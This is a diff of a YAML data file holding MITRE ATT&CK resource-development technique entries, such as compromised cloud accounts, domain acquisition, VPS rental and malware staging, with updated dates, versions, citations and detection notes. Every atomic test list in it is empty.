@@ -89299,33 +89964,31 @@ resource-development:
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.003:
     technique:
-      modified: '2022-10-21T14:21:57.991Z'
+      modified: '2024-10-16T21:26:36.312Z'
       name: Cloud Accounts
       description: |-
-        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
 
         A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Francesco Bigarella
+      x_mitre_deprecated: false
       x_mitre_detection: 'Much of this activity will take place outside the visibility
         of the target organization, making detection of this behavior difficult. Detection
         efforts may be focused on related stages of the adversary lifecycle, such
         as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Francesco Bigarella
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
       created: '2022-05-27T14:30:01.904Z'
@@ -89335,10 +89998,19 @@ resource-development:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1586/003
         external_id: T1586.003
+      - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+        description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+          Case Studies From the Wild. Retrieved March 9, 2023.'
+        url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       - source_name: Awake Security C2 Cloud
         description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
           Command & Control in the Cloud. Retrieved May 27, 2022.'
         url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+      - source_name: Netcraft SendGrid 2024
+        description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+          is abused to host phishing attacks impersonating itself. Retrieved October
+          15, 2024.
+        url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
       - source_name: MSTIC Nobelium Oct 2021
         description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
           targeting delegated administrative privileges to facilitate broader attacks.
@@ -89346,9 +90018,8 @@ resource-development:
         url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586.002:
     technique:
@@ -89399,11 +90070,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.001:
     technique:
-      modified: '2023-04-11T23:22:49.534Z'
+      modified: '2024-10-16T20:13:40.501Z'
       name: Upload Malware
       description: |-
         Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -89416,7 +90086,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Kobi Haimovich, CardinalOps
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
@@ -89451,22 +90121,25 @@ resource-development:
         url: https://blog.talosintelligence.com/ipfs-abuse/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.001:
     technique:
-      modified: '2024-04-13T14:03:04.511Z'
+      modified: '2024-09-25T15:26:00.047Z'
       name: Domains
       description: |-
         Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
 
-        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+        Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
 
         Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
 
         Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+        In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
@@ -89487,7 +90160,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -89526,6 +90199,10 @@ resource-development:
         description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
           OPERATIONS?. Retrieved August 19, 2015.'
         url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
       - source_name: Domain_Steal_CC
         description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
           Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -89581,7 +90258,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.002:
     technique:
@@ -89639,7 +90315,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.004:
     technique:
@@ -89719,7 +90394,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.002:
     technique:
@@ -89779,7 +90453,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.001:
     technique:
@@ -89801,7 +90474,7 @@ resource-development:
         description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
           SunshopFireEye. Retrieved March 6, 2017.'
         url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:15:52.805Z'
       name: Malware
       description: |-
         Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
@@ -89820,42 +90493,10 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
       - 'Malware Repository: Malware Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
-      type: attack-pattern
-      created: '2020-10-01T00:44:23.935Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1583.003
-        url: https://attack.mitre.org/techniques/T1583/003
-      - source_name: TrendmicroHideoutsLease
-        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
-          Bulletproof Hosting Services. Retrieved March 6, 2017.'
-        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
-      - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
-        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
-          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      - source_name: Mandiant SCANdalous Jul 2020
-        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
-        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
-          Using Network Scan Data and Automation). Retrieved October 12, 2021.
-      - source_name: Koczwara Beacon Hunting Sep 2021
-        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
-        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
-          Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:22:11.113Z'
       name: Virtual Private Server
       description: |-
         Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
@@ -89864,22 +90505,53 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+      created: '2020-10-01T00:44:23.935Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1583/003
+        external_id: T1583.003
+      - source_name: Koczwara Beacon Hunting Sep 2021
+        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+          Shodan. Retrieved October 12, 2021.
+        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+      - source_name: TrendmicroHideoutsLease
+        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+          Bulletproof Hosting Services. Retrieved March 6, 2017.'
+        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+      - source_name: Mandiant SCANdalous Jul 2020
+        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+          Using Network Scan Data and Automation). Retrieved October 12, 2021.
+        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+      - source_name: ThreatConnect Infrastructure Dec 2020
+        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584:
     technique:
-      modified: '2024-03-28T03:53:28.299Z'
+      modified: '2024-10-16T20:06:03.570Z'
       name: Compromise Infrastructure
       description: |-
         Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
@@ -89893,7 +90565,7 @@ resource-development:
       x_mitre_contributors:
       - Jeremy Galloway
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
         information and/or domain resolution information that may indicate the compromise
@@ -89980,11 +90652,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T01:08:56.774Z'
       name: Compromise Accounts
       description: "Adversaries may compromise accounts with services that can be
         used during targeting. For operations incorporating social engineering, the
@@ -90044,7 +90715,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.005:
     technique:
@@ -90086,7 +90756,7 @@ resource-development:
         servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
         adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
         or Distributed Denial of Service (DDoS).'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T15:55:58.319Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Botnet
       x_mitre_detection: Much of this activity will take place outside the visibility
@@ -90101,7 +90771,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608:
     technique:
@@ -90192,11 +90861,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.005:
     technique:
-      modified: '2024-04-13T14:03:24.673Z'
+      modified: '2024-10-16T20:09:41.391Z'
       name: Link Target
       description: "Adversaries may put in place resources that are referenced by
         a link that can be used during targeting. An adversary may rely upon a user
@@ -90229,15 +90897,16 @@ resource-development:
         to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
         Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
         In addition, adversaries may serve a variety of malicious links through uniquely
-        generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
-        Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
-        decentralized nature of the InterPlanetary File System (IPFS) to host link
-        targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+        generated URIs/URLs (including one-time, single use links).(Citation: iOS
+        URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+        adversaries may take advantage of the decentralized nature of the InterPlanetary
+        File System (IPFS) to host link targets that are difficult to remove.(Citation:
+        Talos IPFS 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hen Porcilan
       - Diyar Saadi Ali
       - Nikola Kovac
@@ -90321,7 +90990,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.006:
     technique:
@@ -90375,7 +91043,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.003:
     technique:
@@ -90426,36 +91093,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - SOCCRATES
-      - Mnemonic AS
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
-      type: attack-pattern
-      created: '2020-10-01T02:08:33.977Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.002
-        url: https://attack.mitre.org/techniques/T1588/002
-      - source_name: Recorded Future Beacon 2019
-        url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
-        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
-          Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      modified: '2021-10-17T16:17:55.499Z'
+      modified: '2024-09-16T16:20:16.431Z'
       name: Tool
       description: |-
         Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -90464,21 +91105,47 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - SOCCRATES
+      - Mnemonic AS
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+      created: '2020-10-01T02:08:33.977Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/002
+        external_id: T1588.002
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: Recorded Future Beacon 2019
+        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+          Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584.006:
     technique:
-      modified: '2023-04-12T20:19:21.620Z'
+      modified: '2024-10-15T16:44:09.114Z'
       name: Web Services
       description: 'Adversaries may compromise access to third-party web services that
         can be used during targeting. A variety of popular websites exist for legitimate
@@ -90524,17 +91191,16 @@ resource-development:
         external_id: T1584.006
       - source_name: Recorded Future Turla Infra 2020
         description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
-          Tracking Turla Infrastructure. Retrieved October 20, 2020.'
-        url: https://www.recordedfuture.com/turla-apt-infrastructure/
+          Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/research/turla-apt-infrastructure
       - source_name: ThreatConnect Infrastructure Dec 2020
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.001:
     technique:
@@ -90560,7 +91226,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:37:34.563Z'
       name: Social Media Accounts
       description: "Adversaries may create and cultivate social media accounts that
         can be used during targeting. Adversaries can create social media accounts
@@ -90592,8 +91258,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Persona: Social Media'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.004:
     technique:
@@ -90620,7 +91284,7 @@ resource-development:
         url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
         description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
           Exploitation. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:07:53.803Z'
       name: Exploits
       description: |-
         Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -90644,8 +91308,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.003:
     technique:
@@ -90671,7 +91333,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
